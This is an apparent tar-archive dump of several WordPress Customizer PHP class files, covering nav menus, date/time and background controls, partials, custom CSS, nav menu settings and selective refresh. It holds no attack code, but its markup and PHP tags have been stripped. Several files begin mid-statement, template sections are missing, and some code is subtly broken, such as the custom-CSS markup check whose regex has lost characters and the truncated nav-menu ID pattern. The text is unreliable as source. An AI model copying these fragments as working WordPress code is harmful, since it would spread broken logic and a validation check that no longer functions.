setting->term_id;
return $exported;
}
}
class-wp-customize-nav-menus-panel.php 0000644 00000006355 15222250760 0014044 0 ustar 00 render_screen_options( array( 'wrap' => false ) );
}
/**
* Returns the advanced options for the nav menus page.
*
* Link title attribute added as it's a relatively advanced concept for new users.
*
* @since 4.3.0
* @deprecated 4.5.0 Deprecated in favor of wp_nav_menu_manage_columns().
*/
public function wp_nav_menu_manage_columns() {
_deprecated_function( __METHOD__, '4.5.0', 'wp_nav_menu_manage_columns' );
require_once ABSPATH . 'wp-admin/includes/nav-menu.php';
return wp_nav_menu_manage_columns();
}
/**
* An Underscore (JS) template for this panel's content (but not its container).
*
* Class variables for this panel class are available in the `data` JS object;
* export custom variables by overriding WP_Customize_Panel::json().
*
* @since 4.3.0
*
* @see WP_Customize_Panel::print_template()
*/
protected function content_template() {
?>
%s × %s', $width, $height )
);
} elseif ( $width ) {
printf(
/* translators: %s: Header width in pixels. */
__( 'Click “Add Image” to upload an image file from your computer. Your theme works best with an image with a header width of %s pixels — you’ll be able to crop your image once you upload it for a perfect fit.' ),
sprintf( '%s', $width )
);
} else {
printf(
/* translators: %s: Header height in pixels. */
__( 'Click “Add Image” to upload an image file from your computer. Your theme works best with an image with a header height of %s pixels — you’ll be able to crop your image once you upload it for a perfect fit.' ),
sprintf( '%s', $height )
);
}
?>
get_month_abbrev( $wp_locale->get_month( $i ) );
/* translators: 1: Month number (01, 02, etc.), 2: Month abbreviation. */
$months[ $i ]['text'] = sprintf( __( '%1$s-%2$s' ), $i, $month_text );
$months[ $i ]['value'] = $i;
}
return array(
'month_choices' => $months,
);
}
/**
* Get timezone info.
*
* @since 4.9.0
*
* @return array {
* Timezone info. All properties are optional.
*
* @type string $abbr Timezone abbreviation. Examples: PST or CEST.
* @type string $description Human-readable timezone description as HTML.
* }
*/
public function get_timezone_info() {
$tz_string = get_option( 'timezone_string' );
$timezone_info = array();
if ( $tz_string ) {
try {
$tz = new DateTimeZone( $tz_string );
} catch ( Exception $e ) {
$tz = '';
}
if ( $tz ) {
$now = new DateTime( 'now', $tz );
$formatted_gmt_offset = $this->format_gmt_offset( $tz->getOffset( $now ) / HOUR_IN_SECONDS );
$tz_name = str_replace( '_', ' ', $tz->getName() );
$timezone_info['abbr'] = $now->format( 'T' );
$timezone_info['description'] = sprintf(
/* translators: 1: Timezone name, 2: Timezone abbreviation, 3: UTC abbreviation and offset, 4: UTC offset. */
__( 'Your timezone is set to %1$s (%2$s), currently %3$s (Coordinated Universal Time %4$s).' ),
$tz_name,
'' . $timezone_info['abbr'] . '',
'UTC' . $formatted_gmt_offset,
$formatted_gmt_offset
);
} else {
$timezone_info['description'] = '';
}
} else {
$formatted_gmt_offset = $this->format_gmt_offset( (int) get_option( 'gmt_offset', 0 ) );
$timezone_info['description'] = sprintf(
/* translators: 1: UTC abbreviation and offset, 2: UTC offset. */
__( 'Your timezone is set to %1$s (Coordinated Universal Time %2$s).' ),
'UTC' . $formatted_gmt_offset,
$formatted_gmt_offset
);
}
return $timezone_info;
}
/**
* Format GMT Offset.
*
* @since 4.9.0
*
* @see wp_timezone_choice()
*
* @param float $offset Offset in hours.
* @return string Formatted offset.
*/
public function format_gmt_offset( $offset ) {
if ( 0 <= $offset ) {
$formatted_offset = '+' . (string) $offset;
} else {
$formatted_offset = (string) $offset;
}
$formatted_offset = str_replace(
array( '.25', '.5', '.75' ),
array( ':15', ':30', ':45' ),
$formatted_offset
);
return $formatted_offset;
}
}
class-wp-customize-background-image-control.php 0000644 00000002404 15222250760 0015702 0 ustar 00 __( 'Background Image' ),
'section' => 'background_image',
)
);
}
/**
* Enqueue control related scripts/styles.
*
* @since 4.1.0
*/
public function enqueue() {
parent::enqueue();
$custom_background = get_theme_support( 'custom-background' );
wp_localize_script(
'customize-controls',
'_wpCustomizeBackground',
array(
'defaults' => ! empty( $custom_background[0] ) ? $custom_background[0] : array(),
'nonces' => array(
'add' => wp_create_nonce( 'background-add' ),
),
)
);
}
}
class-wp-customize-partial.php 0000644 00000024510 15222250760 0012463 0 ustar 00 $key = $args[ $key ];
}
}
$this->component = $component;
$this->id = $id;
$this->id_data['keys'] = preg_split( '/\[/', str_replace( ']', '', $this->id ) );
$this->id_data['base'] = array_shift( $this->id_data['keys'] );
if ( empty( $this->render_callback ) ) {
$this->render_callback = array( $this, 'render_callback' );
}
// Process settings.
if ( ! isset( $this->settings ) ) {
$this->settings = array( $id );
} elseif ( is_string( $this->settings ) ) {
$this->settings = array( $this->settings );
}
if ( empty( $this->primary_setting ) ) {
$this->primary_setting = current( $this->settings );
}
}
/**
* Retrieves parsed ID data for multidimensional setting.
*
* @since 4.5.0
*
* @return array {
* ID data for multidimensional partial.
*
* @type string $base ID base.
* @type array $keys Keys for multidimensional array.
* }
*/
final public function id_data() {
return $this->id_data;
}
/**
* Renders the template partial involving the associated settings.
*
* @since 4.5.0
*
* @param array $container_context Optional. Array of context data associated with the target container (placement).
* Default empty array.
* @return string|array|false The rendered partial as a string, raw data array (for client-side JS template),
* or false if no render applied.
*/
final public function render( $container_context = array() ) {
$partial = $this;
$rendered = false;
if ( ! empty( $this->render_callback ) ) {
ob_start();
$return_render = call_user_func( $this->render_callback, $this, $container_context );
$ob_render = ob_get_clean();
if ( null !== $return_render && '' !== $ob_render ) {
_doing_it_wrong( __FUNCTION__, __( 'Partial render must echo the content or return the content string (or array), but not both.' ), '4.5.0' );
}
/*
* Note that the string return takes precedence because the $ob_render may just\
* include PHP warnings or notices.
*/
$rendered = null !== $return_render ? $return_render : $ob_render;
}
/**
* Filters partial rendering.
*
* @since 4.5.0
*
* @param string|array|false $rendered The partial value. Default false.
* @param WP_Customize_Partial $partial WP_Customize_Setting instance.
* @param array $container_context Optional array of context data associated with
* the target container.
*/
$rendered = apply_filters( 'customize_partial_render', $rendered, $partial, $container_context );
/**
* Filters partial rendering for a specific partial.
*
* The dynamic portion of the hook name, `$partial->ID` refers to the partial ID.
*
* @since 4.5.0
*
* @param string|array|false $rendered The partial value. Default false.
* @param WP_Customize_Partial $partial WP_Customize_Setting instance.
* @param array $container_context Optional array of context data associated with
* the target container.
*/
$rendered = apply_filters( "customize_partial_render_{$partial->id}", $rendered, $partial, $container_context );
return $rendered;
}
/**
* Default callback used when invoking WP_Customize_Control::render().
*
* Note that this method may echo the partial *or* return the partial as
* a string or array, but not both. Output buffering is performed when this
* is called. Subclasses can override this with their specific logic, or they
* may provide an 'render_callback' argument to the constructor.
*
* This method may return an HTML string for straight DOM injection, or it
* may return an array for supporting Partial JS subclasses to render by
* applying to client-side templating.
*
* @since 4.5.0
*
* @param WP_Customize_Partial $partial Partial.
* @param array $context Context.
* @return string|array|false
*/
public function render_callback( WP_Customize_Partial $partial, $context = array() ) {
unset( $partial, $context );
return false;
}
/**
* Retrieves the data to export to the client via JSON.
*
* @since 4.5.0
*
* @return array Array of parameters passed to the JavaScript.
*/
public function json() {
$exports = array(
'settings' => $this->settings,
'primarySetting' => $this->primary_setting,
'selector' => $this->selector,
'type' => $this->type,
'fallbackRefresh' => $this->fallback_refresh,
'containerInclusive' => $this->container_inclusive,
);
return $exports;
}
/**
* Checks if the user can refresh this partial.
*
* Returns false if the user cannot manipulate one of the associated settings,
* or if one of the associated settings does not exist.
*
* @since 4.5.0
*
* @return bool False if user can't edit one of the related settings,
* or if one of the associated settings does not exist.
*/
final public function check_capabilities() {
if ( ! empty( $this->capability ) && ! current_user_can( $this->capability ) ) {
return false;
}
foreach ( $this->settings as $setting_id ) {
$setting = $this->component->manager->get_setting( $setting_id );
if ( ! $setting || ! $setting->check_capabilities() ) {
return false;
}
}
return true;
}
}
class-wp-customize-background-image-setting.php 0000644 00000001177 15222250760 0015705 0 ustar 00
<# if ( data.description ) { #>
{{ data.description }}
<# } #>
id_data['base'] ) {
throw new Exception( 'Expected custom_css id_base.' );
}
if ( 1 !== count( $this->id_data['keys'] ) || empty( $this->id_data['keys'][0] ) ) {
throw new Exception( 'Expected single stylesheet key.' );
}
$this->stylesheet = $this->id_data['keys'][0];
}
/**
* Add filter to preview post value.
*
* @since 4.7.9
*
* @return bool False when preview short-circuits due no change needing to be previewed.
*/
public function preview() {
if ( $this->is_previewed ) {
return false;
}
$this->is_previewed = true;
add_filter( 'wp_get_custom_css', array( $this, 'filter_previewed_wp_get_custom_css' ), 9, 2 );
return true;
}
/**
* Filters `wp_get_custom_css` for applying the customized value.
*
* This is used in the preview when `wp_get_custom_css()` is called for rendering the styles.
*
* @since 4.7.0
*
* @see wp_get_custom_css()
*
* @param string $css Original CSS.
* @param string $stylesheet Current stylesheet.
* @return string CSS.
*/
public function filter_previewed_wp_get_custom_css( $css, $stylesheet ) {
if ( $stylesheet === $this->stylesheet ) {
$customized_value = $this->post_value( null );
if ( ! is_null( $customized_value ) ) {
$css = $customized_value;
}
}
return $css;
}
/**
* Fetch the value of the setting. Will return the previewed value when `preview()` is called.
*
* @since 4.7.0
*
* @see WP_Customize_Setting::value()
*
* @return string
*/
public function value() {
if ( $this->is_previewed ) {
$post_value = $this->post_value( null );
if ( null !== $post_value ) {
return $post_value;
}
}
$id_base = $this->id_data['base'];
$value = '';
$post = wp_get_custom_css_post( $this->stylesheet );
if ( $post ) {
$value = $post->post_content;
}
if ( empty( $value ) ) {
$value = $this->default;
}
/** This filter is documented in wp-includes/class-wp-customize-setting.php */
$value = apply_filters( "customize_value_{$id_base}", $value, $this );
return $value;
}
/**
* Validate a received value for being valid CSS.
*
* Checks for imbalanced braces, brackets, and comments.
* Notifications are rendered when the customizer state is saved.
*
* @since 4.7.0
* @since 4.9.0 Checking for balanced characters has been moved client-side via linting in code editor.
* @since 5.9.0 Renamed `$css` to `$value` for PHP 8 named parameter support.
*
* @param string $value CSS to validate.
* @return true|WP_Error True if the input was validated, otherwise WP_Error.
*/
public function validate( $value ) {
// Restores the more descriptive, specific name for use within this method.
$css = $value;
$validity = new WP_Error();
if ( preg_match( '#?\w+#', $css ) ) {
$validity->add( 'illegal_markup', __( 'Markup is not allowed in CSS.' ) );
}
if ( ! $validity->has_errors() ) {
$validity = parent::validate( $css );
}
return $validity;
}
/**
* Store the CSS setting value in the custom_css custom post type for the stylesheet.
*
* @since 4.7.0
* @since 5.9.0 Renamed `$css` to `$value` for PHP 8 named parameter support.
*
* @param string $value CSS to update.
* @return int|false The post ID or false if the value could not be saved.
*/
public function update( $value ) {
// Restores the more descriptive, specific name for use within this method.
$css = $value;
if ( empty( $css ) ) {
$css = '';
}
$r = wp_update_custom_css_post(
$css,
array(
'stylesheet' => $this->stylesheet,
)
);
if ( is_wp_error( $r ) ) {
return false;
}
$post_id = $r->ID;
// Cache post ID in theme mod for performance to avoid additional DB query.
if ( $this->manager->get_stylesheet() === $this->stylesheet ) {
set_theme_mod( 'custom_css_post_id', $post_id );
}
return $post_id;
}
}
class-wp-customize-new-menu-control.php 0000644 00000003256 15222250760 0014244 0 ustar 00
-?\d+)\]$/';
const TAXONOMY = 'nav_menu';
const TYPE = 'nav_menu';
/**
* Setting type.
*
* @since 4.3.0
* @var string
*/
public $type = self::TYPE;
/**
* Default setting value.
*
* @since 4.3.0
* @var array
*
* @see wp_get_nav_menu_object()
*/
public $default = array(
'name' => '',
'description' => '',
'parent' => 0,
'auto_add' => false,
);
/**
* Default transport.
*
* @since 4.3.0
* @var string
*/
public $transport = 'postMessage';
/**
* The term ID represented by this setting instance.
*
* A negative value represents a placeholder ID for a new menu not yet saved.
*
* @since 4.3.0
* @var int
*/
public $term_id;
/**
* Previous (placeholder) term ID used before creating a new menu.
*
* This value will be exported to JS via the {@see 'customize_save_response'} filter
* so that JavaScript can update the settings to refer to the newly-assigned
* term ID. This value is always negative to indicate it does not refer to
* a real term.
*
* @since 4.3.0
* @var int
*
* @see WP_Customize_Nav_Menu_Setting::update()
* @see WP_Customize_Nav_Menu_Setting::amend_customize_save_response()
*/
public $previous_term_id;
/**
* Whether or not update() was called.
*
* @since 4.3.0
* @var bool
*/
protected $is_updated = false;
/**
* Status for calling the update method, used in customize_save_response filter.
*
* See {@see 'customize_save_response'}.
*
* When status is inserted, the placeholder term ID is stored in `$previous_term_id`.
* When status is error, the error is stored in `$update_error`.
*
* @since 4.3.0
* @var string updated|inserted|deleted|error
*
* @see WP_Customize_Nav_Menu_Setting::update()
* @see WP_Customize_Nav_Menu_Setting::amend_customize_save_response()
*/
public $update_status;
/**
* Any error object returned by wp_update_nav_menu_object() when setting is updated.
*
* @since 4.3.0
* @var WP_Error
*
* @see WP_Customize_Nav_Menu_Setting::update()
* @see WP_Customize_Nav_Menu_Setting::amend_customize_save_response()
*/
public $update_error;
/**
* Constructor.
*
* Any supplied $args override class property defaults.
*
* @since 4.3.0
*
* @throws Exception If $id is not valid for this setting type.
*
* @param WP_Customize_Manager $manager Customizer bootstrap instance.
* @param string $id A specific ID of the setting.
* Can be a theme mod or option name.
* @param array $args Optional. Setting arguments.
*/
public function __construct( WP_Customize_Manager $manager, $id, array $args = array() ) {
if ( empty( $manager->nav_menus ) ) {
throw new Exception( 'Expected WP_Customize_Manager::$nav_menus to be set.' );
}
if ( ! preg_match( self::ID_PATTERN, $id, $matches ) ) {
throw new Exception( "Illegal widget setting ID: $id" );
}
$this->term_id = (int) $matches['id'];
parent::__construct( $manager, $id, $args );
}
/**
* Get the instance data for a given widget setting.
*
* @since 4.3.0
*
* @see wp_get_nav_menu_object()
*
* @return array Instance data.
*/
public function value() {
if ( $this->is_previewed && get_current_blog_id() === $this->_previewed_blog_id ) {
$undefined = new stdClass(); // Symbol.
$post_value = $this->post_value( $undefined );
if ( $undefined === $post_value ) {
$value = $this->_original_value;
} else {
$value = $post_value;
}
} else {
$value = false;
// Note that a term_id of less than one indicates a nav_menu not yet inserted.
if ( $this->term_id > 0 ) {
$term = wp_get_nav_menu_object( $this->term_id );
if ( $term ) {
$value = wp_array_slice_assoc( (array) $term, array_keys( $this->default ) );
$nav_menu_options = (array) get_option( 'nav_menu_options', array() );
$value['auto_add'] = false;
if ( isset( $nav_menu_options['auto_add'] ) && is_array( $nav_menu_options['auto_add'] ) ) {
$value['auto_add'] = in_array( $term->term_id, $nav_menu_options['auto_add'], true );
}
}
}
if ( ! is_array( $value ) ) {
$value = $this->default;
}
}
return $value;
}
/**
* Handle previewing the setting.
*
* @since 4.3.0
* @since 4.4.0 Added boolean return value
*
* @see WP_Customize_Manager::post_value()
*
* @return bool False if method short-circuited due to no-op.
*/
public function preview() {
if ( $this->is_previewed ) {
return false;
}
$undefined = new stdClass();
$is_placeholder = ( $this->term_id < 0 );
$is_dirty = ( $undefined !== $this->post_value( $undefined ) );
if ( ! $is_placeholder && ! $is_dirty ) {
return false;
}
$this->is_previewed = true;
$this->_original_value = $this->value();
$this->_previewed_blog_id = get_current_blog_id();
add_filter( 'wp_get_nav_menus', array( $this, 'filter_wp_get_nav_menus' ), 10, 2 );
add_filter( 'wp_get_nav_menu_object', array( $this, 'filter_wp_get_nav_menu_object' ), 10, 2 );
add_filter( 'default_option_nav_menu_options', array( $this, 'filter_nav_menu_options' ) );
add_filter( 'option_nav_menu_options', array( $this, 'filter_nav_menu_options' ) );
return true;
}
/**
* Filters the wp_get_nav_menus() result to ensure the inserted menu object is included, and the deleted one is removed.
*
* @since 4.3.0
*
* @see wp_get_nav_menus()
*
* @param WP_Term[] $menus An array of menu objects.
* @param array $args An array of arguments used to retrieve menu objects.
* @return WP_Term[] Array of menu objects.
*/
public function filter_wp_get_nav_menus( $menus, $args ) {
if ( get_current_blog_id() !== $this->_previewed_blog_id ) {
return $menus;
}
$setting_value = $this->value();
$is_delete = ( false === $setting_value );
$index = -1;
// Find the existing menu item's position in the list.
foreach ( $menus as $i => $menu ) {
if ( (int) $this->term_id === (int) $menu->term_id || (int) $this->previous_term_id === (int) $menu->term_id ) {
$index = $i;
break;
}
}
if ( $is_delete ) {
// Handle deleted menu by removing it from the list.
if ( -1 !== $index ) {
array_splice( $menus, $index, 1 );
}
} else {
// Handle menus being updated or inserted.
$menu_obj = (object) array_merge(
array(
'term_id' => $this->term_id,
'term_taxonomy_id' => $this->term_id,
'slug' => sanitize_title( $setting_value['name'] ),
'count' => 0,
'term_group' => 0,
'taxonomy' => self::TAXONOMY,
'filter' => 'raw',
),
$setting_value
);
array_splice( $menus, $index, ( -1 === $index ? 0 : 1 ), array( $menu_obj ) );
}
// Make sure the menu objects get re-sorted after an update/insert.
if ( ! $is_delete && ! empty( $args['orderby'] ) ) {
$menus = wp_list_sort(
$menus,
array(
$args['orderby'] => 'ASC',
)
);
}
// @todo Add support for $args['hide_empty'] === true.
return $menus;
}
/**
* Temporary non-closure passing of orderby value to function.
*
* @since 4.3.0
* @var string
*
* @see WP_Customize_Nav_Menu_Setting::filter_wp_get_nav_menus()
* @see WP_Customize_Nav_Menu_Setting::_sort_menus_by_orderby()
*/
protected $_current_menus_sort_orderby;
/**
* Sort menu objects by the class-supplied orderby property.
*
* This is a workaround for a lack of closures.
*
* @since 4.3.0
* @deprecated 4.7.0 Use wp_list_sort()
*
* @param object $menu1
* @param object $menu2
* @return int
*
* @see WP_Customize_Nav_Menu_Setting::filter_wp_get_nav_menus()
*/
protected function _sort_menus_by_orderby( $menu1, $menu2 ) {
_deprecated_function( __METHOD__, '4.7.0', 'wp_list_sort' );
$key = $this->_current_menus_sort_orderby;
return strcmp( $menu1->$key, $menu2->$key );
}
/**
* Filters the wp_get_nav_menu_object() result to supply the previewed menu object.
*
* Requesting a nav_menu object by anything but ID is not supported.
*
* @since 4.3.0
*
* @see wp_get_nav_menu_object()
*
* @param object|null $menu_obj Object returned by wp_get_nav_menu_object().
* @param string $menu_id ID of the nav_menu term. Requests by slug or name will be ignored.
* @return object|null
*/
public function filter_wp_get_nav_menu_object( $menu_obj, $menu_id ) {
$ok = (
get_current_blog_id() === $this->_previewed_blog_id
&&
is_int( $menu_id )
&&
$menu_id === $this->term_id
);
if ( ! $ok ) {
return $menu_obj;
}
$setting_value = $this->value();
// Handle deleted menus.
if ( false === $setting_value ) {
return false;
}
// Handle sanitization failure by preventing short-circuiting.
if ( null === $setting_value ) {
return $menu_obj;
}
$menu_obj = (object) array_merge(
array(
'term_id' => $this->term_id,
'term_taxonomy_id' => $this->term_id,
'slug' => sanitize_title( $setting_value['name'] ),
'count' => 0,
'term_group' => 0,
'taxonomy' => self::TAXONOMY,
'filter' => 'raw',
),
$setting_value
);
return $menu_obj;
}
/**
* Filters the nav_menu_options option to include this menu's auto_add preference.
*
* @since 4.3.0
*
* @param array $nav_menu_options Nav menu options including auto_add.
* @return array (Maybe) modified nav menu options.
*/
public function filter_nav_menu_options( $nav_menu_options ) {
if ( get_current_blog_id() !== $this->_previewed_blog_id ) {
return $nav_menu_options;
}
$menu = $this->value();
$nav_menu_options = $this->filter_nav_menu_options_value(
$nav_menu_options,
$this->term_id,
false === $menu ? false : $menu['auto_add']
);
return $nav_menu_options;
}
/**
* Sanitize an input.
*
* Note that parent::sanitize() erroneously does wp_unslash() on $value, but
* we remove that in this override.
*
* @since 4.3.0
*
* @param array $value The menu value to sanitize.
* @return array|false|null Null if an input isn't valid. False if it is marked for deletion.
* Otherwise the sanitized value.
*/
public function sanitize( $value ) {
// Menu is marked for deletion.
if ( false === $value ) {
return $value;
}
// Invalid.
if ( ! is_array( $value ) ) {
return null;
}
$default = array(
'name' => '',
'description' => '',
'parent' => 0,
'auto_add' => false,
);
$value = array_merge( $default, $value );
$value = wp_array_slice_assoc( $value, array_keys( $default ) );
$value['name'] = trim( esc_html( $value['name'] ) ); // This sanitization code is used in wp-admin/nav-menus.php.
$value['description'] = sanitize_text_field( $value['description'] );
$value['parent'] = max( 0, (int) $value['parent'] );
$value['auto_add'] = ! empty( $value['auto_add'] );
if ( '' === $value['name'] ) {
$value['name'] = _x( '(unnamed)', 'Missing menu name.' );
}
/** This filter is documented in wp-includes/class-wp-customize-setting.php */
return apply_filters( "customize_sanitize_{$this->id}", $value, $this );
}
/**
* Storage for data to be sent back to client in customize_save_response filter.
*
* See {@see 'customize_save_response'}.
*
* @since 4.3.0
* @var array
*
* @see WP_Customize_Nav_Menu_Setting::amend_customize_save_response()
*/
protected $_widget_nav_menu_updates = array();
/**
* Create/update the nav_menu term for this setting.
*
* Any created menus will have their assigned term IDs exported to the client
* via the {@see 'customize_save_response'} filter. Likewise, any errors will be exported
* to the client via the customize_save_response() filter.
*
* To delete a menu, the client can send false as the value.
*
* @since 4.3.0
*
* @see wp_update_nav_menu_object()
*
* @param array|false $value {
* The value to update. Note that slug cannot be updated via wp_update_nav_menu_object().
* If false, then the menu will be deleted entirely.
*
* @type string $name The name of the menu to save.
* @type string $description The term description. Default empty string.
* @type int $parent The id of the parent term. Default 0.
* @type bool $auto_add Whether pages will auto_add to this menu. Default false.
* }
* @return null|void
*/
protected function update( $value ) {
if ( $this->is_updated ) {
return;
}
$this->is_updated = true;
$is_placeholder = ( $this->term_id < 0 );
$is_delete = ( false === $value );
add_filter( 'customize_save_response', array( $this, 'amend_customize_save_response' ) );
$auto_add = null;
if ( $is_delete ) {
// If the current setting term is a placeholder, a delete request is a no-op.
if ( $is_placeholder ) {
$this->update_status = 'deleted';
} else {
$r = wp_delete_nav_menu( $this->term_id );
if ( is_wp_error( $r ) ) {
$this->update_status = 'error';
$this->update_error = $r;
} else {
$this->update_status = 'deleted';
$auto_add = false;
}
}
} else {
// Insert or update menu.
$menu_data = wp_array_slice_assoc( $value, array( 'description', 'parent' ) );
$menu_data['menu-name'] = $value['name'];
$menu_id = $is_placeholder ? 0 : $this->term_id;
$r = wp_update_nav_menu_object( $menu_id, wp_slash( $menu_data ) );
$original_name = $menu_data['menu-name'];
$name_conflict_suffix = 1;
while ( is_wp_error( $r ) && 'menu_exists' === $r->get_error_code() ) {
$name_conflict_suffix += 1;
/* translators: 1: Original menu name, 2: Duplicate count. */
$menu_data['menu-name'] = sprintf( __( '%1$s (%2$d)' ), $original_name, $name_conflict_suffix );
$r = wp_update_nav_menu_object( $menu_id, wp_slash( $menu_data ) );
}
if ( is_wp_error( $r ) ) {
$this->update_status = 'error';
$this->update_error = $r;
} else {
if ( $is_placeholder ) {
$this->previous_term_id = $this->term_id;
$this->term_id = $r;
$this->update_status = 'inserted';
} else {
$this->update_status = 'updated';
}
$auto_add = $value['auto_add'];
}
}
if ( null !== $auto_add ) {
$nav_menu_options = $this->filter_nav_menu_options_value(
(array) get_option( 'nav_menu_options', array() ),
$this->term_id,
$auto_add
);
update_option( 'nav_menu_options', $nav_menu_options );
}
if ( 'inserted' === $this->update_status ) {
// Make sure that new menus assigned to nav menu locations use their new IDs.
foreach ( $this->manager->settings() as $setting ) {
if ( ! preg_match( '/^nav_menu_locations\[/', $setting->id ) ) {
continue;
}
$post_value = $setting->post_value( null );
if ( ! is_null( $post_value ) && (int) $post_value === $this->previous_term_id ) {
$this->manager->set_post_value( $setting->id, $this->term_id );
$setting->save();
}
}
// Make sure that any nav_menu widgets referencing the placeholder nav menu get updated and sent back to client.
foreach ( array_keys( $this->manager->unsanitized_post_values() ) as $setting_id ) {
$nav_menu_widget_setting = $this->manager->get_setting( $setting_id );
if ( ! $nav_menu_widget_setting || ! preg_match( '/^widget_nav_menu\[/', $nav_menu_widget_setting->id ) ) {
continue;
}
$widget_instance = $nav_menu_widget_setting->post_value(); // Note that this calls WP_Customize_Widgets::sanitize_widget_instance().
if ( empty( $widget_instance['nav_menu'] ) || (int) $widget_instance['nav_menu'] !== $this->previous_term_id ) {
continue;
}
$widget_instance['nav_menu'] = $this->term_id;
$updated_widget_instance = $this->manager->widgets->sanitize_widget_js_instance( $widget_instance );
$this->manager->set_post_value( $nav_menu_widget_setting->id, $updated_widget_instance );
$nav_menu_widget_setting->save();
$this->_widget_nav_menu_updates[ $nav_menu_widget_setting->id ] = $updated_widget_instance;
}
}
}
/**
* Updates a nav_menu_options array.
*
* @since 4.3.0
*
* @see WP_Customize_Nav_Menu_Setting::filter_nav_menu_options()
* @see WP_Customize_Nav_Menu_Setting::update()
*
* @param array $nav_menu_options Array as returned by get_option( 'nav_menu_options' ).
* @param int $menu_id The term ID for the given menu.
* @param bool $auto_add Whether to auto-add or not.
* @return array (Maybe) modified nav_menu_options array.
*/
protected function filter_nav_menu_options_value( $nav_menu_options, $menu_id, $auto_add ) {
$nav_menu_options = (array) $nav_menu_options;
if ( ! isset( $nav_menu_options['auto_add'] ) ) {
$nav_menu_options['auto_add'] = array();
}
$i = array_search( $menu_id, $nav_menu_options['auto_add'], true );
if ( $auto_add && false === $i ) {
array_push( $nav_menu_options['auto_add'], $this->term_id );
} elseif ( ! $auto_add && false !== $i ) {
array_splice( $nav_menu_options['auto_add'], $i, 1 );
}
return $nav_menu_options;
}
/**
* Export data for the JS client.
*
* @since 4.3.0
*
* @see WP_Customize_Nav_Menu_Setting::update()
*
* @param array $data Additional information passed back to the 'saved' event on `wp.customize`.
* @return array Export data.
*/
public function amend_customize_save_response( $data ) {
if ( ! isset( $data['nav_menu_updates'] ) ) {
$data['nav_menu_updates'] = array();
}
if ( ! isset( $data['widget_nav_menu_updates'] ) ) {
$data['widget_nav_menu_updates'] = array();
}
$data['nav_menu_updates'][] = array(
'term_id' => $this->term_id,
'previous_term_id' => $this->previous_term_id,
'error' => $this->update_error ? $this->update_error->get_error_code() : null,
'status' => $this->update_status,
'saved_value' => 'deleted' === $this->update_status ? null : $this->value(),
);
$data['widget_nav_menu_updates'] = array_merge(
$data['widget_nav_menu_updates'],
$this->_widget_nav_menu_updates
);
$this->_widget_nav_menu_updates = array();
return $data;
}
}
class-wp-customize-selective-refresh.php 0000644 00000033023 15222250760 0014445 0 ustar 00 manager = $manager;
require_once ABSPATH . WPINC . '/customize/class-wp-customize-partial.php';
add_action( 'customize_preview_init', array( $this, 'init_preview' ) );
}
/**
* Retrieves the registered partials.
*
* @since 4.5.0
*
* @return array Partials.
*/
public function partials() {
return $this->partials;
}
/**
* Adds a partial.
*
* @since 4.5.0
*
* @see WP_Customize_Partial::__construct()
*
* @param WP_Customize_Partial|string $id Customize Partial object, or Partial ID.
* @param array $args Optional. Array of properties for the new Partials object.
* See WP_Customize_Partial::__construct() for information
* on accepted arguments. Default empty array.
* @return WP_Customize_Partial The instance of the partial that was added.
*/
public function add_partial( $id, $args = array() ) {
if ( $id instanceof WP_Customize_Partial ) {
$partial = $id;
} else {
$class = 'WP_Customize_Partial';
/** This filter is documented in wp-includes/customize/class-wp-customize-selective-refresh.php */
$args = apply_filters( 'customize_dynamic_partial_args', $args, $id );
/** This filter is documented in wp-includes/customize/class-wp-customize-selective-refresh.php */
$class = apply_filters( 'customize_dynamic_partial_class', $class, $id, $args );
$partial = new $class( $this, $id, $args );
}
$this->partials[ $partial->id ] = $partial;
return $partial;
}
/**
* Retrieves a partial.
*
* @since 4.5.0
*
* @param string $id Customize Partial ID.
* @return WP_Customize_Partial|null The partial, if set. Otherwise null.
*/
public function get_partial( $id ) {
if ( isset( $this->partials[ $id ] ) ) {
return $this->partials[ $id ];
} else {
return null;
}
}
/**
* Removes a partial.
*
* @since 4.5.0
*
* @param string $id Customize Partial ID.
*/
public function remove_partial( $id ) {
unset( $this->partials[ $id ] );
}
/**
* Initializes the Customizer preview.
*
* @since 4.5.0
*/
public function init_preview() {
add_action( 'template_redirect', array( $this, 'handle_render_partials_request' ) );
add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_preview_scripts' ) );
}
/**
* Enqueues preview scripts.
*
* @since 4.5.0
*/
public function enqueue_preview_scripts() {
wp_enqueue_script( 'customize-selective-refresh' );
add_action( 'wp_footer', array( $this, 'export_preview_data' ), 1000 );
}
/**
* Exports data in preview after it has finished rendering so that partials can be added at runtime.
*
* @since 4.5.0
*/
public function export_preview_data() {
$partials = array();
foreach ( $this->partials() as $partial ) {
if ( $partial->check_capabilities() ) {
$partials[ $partial->id ] = $partial->json();
}
}
$switched_locale = switch_to_user_locale( get_current_user_id() );
$l10n = array(
'shiftClickToEdit' => __( 'Shift-click to edit this element.' ),
'clickEditMenu' => __( 'Click to edit this menu.' ),
'clickEditWidget' => __( 'Click to edit this widget.' ),
'clickEditTitle' => __( 'Click to edit the site title.' ),
'clickEditMisc' => __( 'Click to edit this element.' ),
/* translators: %s: document.write() */
'badDocumentWrite' => sprintf( __( '%s is forbidden' ), 'document.write()' ),
);
if ( $switched_locale ) {
restore_previous_locale();
}
$exports = array(
'partials' => $partials,
'renderQueryVar' => self::RENDER_QUERY_VAR,
'l10n' => $l10n,
);
// Export data to JS.
wp_print_inline_script_tag( sprintf( 'var _customizePartialRefreshExports = %s;', wp_json_encode( $exports, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) . "\n//# sourceURL=" . rawurlencode( __METHOD__ ) );
}
/**
* Registers dynamically-created partials.
*
* @since 4.5.0
*
* @see WP_Customize_Manager::add_dynamic_settings()
*
* @param string[] $partial_ids Array of the partial IDs to add.
* @return WP_Customize_Partial[] Array of added WP_Customize_Partial instances.
*/
public function add_dynamic_partials( $partial_ids ) {
$new_partials = array();
foreach ( $partial_ids as $partial_id ) {
// Skip partials already created.
$partial = $this->get_partial( $partial_id );
if ( $partial ) {
continue;
}
$partial_args = false;
$partial_class = 'WP_Customize_Partial';
/**
* Filters a dynamic partial's constructor arguments.
*
* For a dynamic partial to be registered, this filter must be employed
* to override the default false value with an array of args to pass to
* the WP_Customize_Partial constructor.
*
* @since 4.5.0
*
* @param false|array $partial_args The arguments to the WP_Customize_Partial constructor.
* @param string $partial_id ID for dynamic partial.
*/
$partial_args = apply_filters( 'customize_dynamic_partial_args', $partial_args, $partial_id );
if ( false === $partial_args ) {
continue;
}
/**
* Filters the class used to construct partials.
*
* Allow non-statically created partials to be constructed with custom WP_Customize_Partial subclass.
*
* @since 4.5.0
*
